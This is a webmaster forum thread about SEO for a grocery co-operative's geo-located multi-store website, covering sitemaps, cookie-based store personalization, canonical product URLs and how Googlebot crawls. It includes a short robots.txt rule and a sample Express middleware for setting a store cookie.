Geo-location by state/store
-
Hi there,
We are a grocery co-operative retailer with a chain of stores owned by different people. We are building a new website where we will geo-locate the closest store to the customer and direct them to a particular store (selected based on a cookie and geo-location). All our stores carry a consistent range of products, with roughly 25% variation between stores. I have a few questions.
-
How should we build the sitemap? Since it will be mandatory for a store to be selected, and the flow will be the same for bots and users, should the sitemap include all products across all stores? We allow users to find any product across all stores if they search by product identifier, but they will only see the products available in a particular store if they go through the hierarchical journey of the website.
-
Will the bot crawl all pages across all the stores, or, since it will be geo-located to only one store, will only the content belonging to that store be indexed?
-
We also allow customers to search for older products which they might have bought a few years ago and which are no longer part of our catalogue. These products will not appear in the hierarchical journey, but customers will be able to search for and find them. Will this affect our SEO ranking?
Any help will be greatly appreciated.
Thanks - Costa
-
If you consistently look at the IP address and redirect, or change content, based only on that, then you will want to exempt Googlebot from those personalizations in one way or another. There are several ways to do this, such as blocking the resources that handle the personalization (i.e. the JavaScript file associated with personalization based on history or geo-location), or doing what was suggested above. Blocking that piece of script in the robots.txt file is less likely to be seen as cloaking.
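For instance, a minimal robots.txt rule along those lines might look like the following; the script path is an assumption and would need to match wherever your geo-personalization code actually lives:

```
# Hypothetical path: block only the script that rewrites content by geo/history
User-agent: *
Disallow: /js/geo-personalize.js
```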
All of this raises a bigger question, though: if you're looking at the IP, then setting a cookie, then updating the content based on the cookie, it shouldn't be an issue in the first place. Googlebot isn't accepting your cookies. So if I were to browse in Incognito mode using Chrome (and thus not retain cookies), would I see the same site and product assortment no matter which location I was in? If that's the case, maybe you don't have a problem. This is pretty easy to test.
Ultimately, I think you're going to want a single product page for each SKU, rather than one for each product at each location. The content, pricing, etc. can be updated by location if the visitor has a cookie, but the URL should probably never change, and the content shouldn't change by IP if they don't have a cookie. The flow would be:
1. Check the IP.
2. Embed the visitor's location in a cookie.
3. Set the cookie.
4. If the cookie is accepted and thus exists, personalize.
If the cookie does not exist, do not personalize. You can show a message saying that cookies must be accepted to get the best experience, but don't let it block any major portion of the content.
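Here is a minimal sketch of that flow as Express-style middleware in TypeScript. The cookie name, store IDs, and geo-lookup function are assumptions for illustration only, not a prescription for your stack:

```typescript
import express, { Request, Response, NextFunction } from "express";
import cookieParser from "cookie-parser";

const STORE_COOKIE = "preferred_store"; // assumed cookie name

// Placeholder: map an IP address to the nearest store ID.
// In practice this would call your geo-IP service.
function geoLocateStore(ip: string | undefined): string {
  return "store-001";
}

const app = express();
app.use(cookieParser());

app.use((req: Request, res: Response, next: NextFunction) => {
  const existingStore = req.cookies[STORE_COOKIE];

  if (existingStore) {
    // The cookie was accepted on an earlier request: safe to personalize.
    res.locals.storeId = existingStore;
    res.locals.personalize = true;
  } else {
    // No cookie yet: offer one based on geo-IP, but serve the default,
    // non-personalized content for this request. Googlebot doesn't keep
    // cookies, so it always lands in this branch and sees the same
    // content regardless of which data centre it crawls from.
    res.cookie(STORE_COOKIE, geoLocateStore(req.ip), {
      maxAge: 30 * 24 * 60 * 60 * 1000,
    });
    res.locals.storeId = null;
    res.locals.personalize = false;
  }
  next();
});

app.get("/product/:sku", (req, res) => {
  // One URL per SKU for every store; only the availability messaging changes.
  res.send(
    res.locals.personalize
      ? `Availability for ${req.params.sku} at ${res.locals.storeId}`
      : `Default catalogue view for ${req.params.sku}`
  );
});
```

The key property is that the URL never changes, and an uncookied visitor (including any crawler) always gets the same default view.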
-
Thanks for this. A few clarifications, please:
Isn't having a different journey for a user and a bot cloaking? Will Google not penalise a site for that? To make it clear: we have a single website, and based on the user's geo we will filter product availability. If a customer is from state A we will show "X" products, and if a customer is from state B we will show X+Y or X-Y. All the products will have a canonical URL included in the sitemap, so even if a product is not navigable through the hierarchy on the website, crawlers will be able to find it through the direct canonical URL.
Here is a link to an article where John Mueller from Google comments on the subject: https://www.seroundtable.com/google-geolocation-redirects-are-okay-26933.html
I have picked excerpts from your reply where I have some doubts; it would be great if you could shed more light on these.
-
- "It seems like you'll have to have the same products available in multiple stores. You will want them all indexed, but will have to work hard to differentiate them (different images, different copy, different Meta data) otherwise Google will probably pick one product from one store as 'canonical' and not index the rest, leading to unfair product purchasing (users only purchasing X product from Y store, never the others)"
Since we will have the same X products across all our stores, and across stores these products will have a single canonical URL, what would be the advantage of having different content per store? We are thinking the content on the product pages will be the same, but the availability of the product alone will differ based on geo. The sitemap will also remain the same across stores, containing the canonical product URLs.
-
- "Will the bot crawl all pages across all the stores or since it will be geolocated to only one store, the content belonging to only one store will be indexed?" - No it won't. Every time Google crawls from a different data centre, they will think all your other pages are being redirected now and that part of the site is now closed. Exempt Googlebot's user-agent from your redirects or face Google's fiery wrath when they fail to index anything properly
Could you please explain a bit more what you mean by redirect? All products will exist on the website for a crawler to see if the canonical URL is used for crawling; only the availability and the product's visibility through the navigation journey will change based on geo.
Thank you for your time on this. It's extremely useful.
Thanks - Costa
-
"We are a Grocery co-operative retailer and have chain of stores owned by different people. We are building a new website, where we would geo-locate the closest store to the customer and direct them to a particular store (selected based on cookie and geo location). All our stores have a consistent range of products + Variation in 25% range. I have few questions" - make sure you exempt Googlebot's user-agent from your geo-based redirects otherwise the crawling of your site will end up in a big horrible mess
-
"How to build a site-map. Since it will be mandatory for a store to be selected and same flow for the bot and user, should have all products across all stores in the sitemap? we are allowing users to find any products across all stores if they search by product identifier. But, they will be able to see products available in a particular store if go through the hierarchical journey of the website." - any pages you want Google to index should be in your XML sitemap. Any pages you don't want Google ti index should not be in there (period). If a URL uses a canonical tag to point somewhere else (and thus marks itself as NON-canonical) it shouldn't be in the XML sitemap. If a URL is blocked via robots.txt or Meta no-index directives, it shouldn't be in the XML sitemap. If a URL results in an error or redirect, it shouldn't be in your XML sitemap.The main thing to concern yourself with, is creating a 'seamless' view of indexation for Google. It seems like you'll have to have the same products available in multiple stores. You will want them all indexed, but will have to work hard to differentiate them (different images, different copy, different Meta data) otherwise Google will probably pick one product from one store as 'canonical' and not index the rest, leading to unfair product purchasing (users only purchasing X product from Y store, never the others). In reality, setting out to build a site which such highly divergent duplication is never going to yield great results, you'll just have to be aware of that from the outset
-
"Will the bot crawl all pages across all the stores or since it will be geolocated to only one store, the content belonging to only one store will be indexed?" - No it won't. Every time Google crawls from a different data centre, they will think all your other pages are being redirected now and that part of the site is now closed. Exempt Googlebot's user-agent from your redirects or face Google's fiery wrath when they fail to index anything properly
-
"We are also allowing customers to search for older products which they might have bought few years and that are not part of out catalogue any more. these products will not appear on the online hierarchical journey but, customers will be able to search and find the products . Will this affect our SEO ranking?" - If the pages are orphaned except in the XML sitemap, their rankings will go down over time. It won't necessarily hurt the rest of your site, though. Sometimes crappy results are better than no results at all!
Hope that helps